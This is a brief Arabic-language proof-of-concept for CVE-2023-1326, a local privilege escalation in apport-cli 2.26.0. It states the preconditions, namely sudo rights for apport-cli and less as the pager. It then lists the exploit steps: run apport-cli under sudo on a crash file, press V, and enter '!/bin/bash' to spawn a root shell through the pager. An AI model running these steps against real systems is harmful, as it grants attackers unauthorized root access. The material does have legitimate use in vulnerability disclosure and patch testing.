
إثبات مفهوم لثغرة CVE-2023–1326 في apport-cli 2.26.0
إثبات مفهوم لـ CVE-2023–1326 في apport-cli 2.26.0
هذه الثغرة هي تصعيد صلاحيات في apport-cli 2.26.0، وهي مشابهة لـ CVE-2023–26604، وتعمل هذه الثغرة فقط إذا تم تعيينها في sudoers:

تم العثور على هجوم تصعيد صلاحيات في apport-cli 2.26.0 والإصدارات السابقة، وهو مشابه لـ CVE-2023-26604. إذا كان النظام مهيأً بشكل خاص للسماح للمستخدمين غير المميزين بتشغيل sudo apport-cli، وكان less مُعدًا كعارض الصفحات، ويمكن تعيين حجم الطرفية: يمكن للمهاجم المحلي تصعيد الصلاحيات.
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
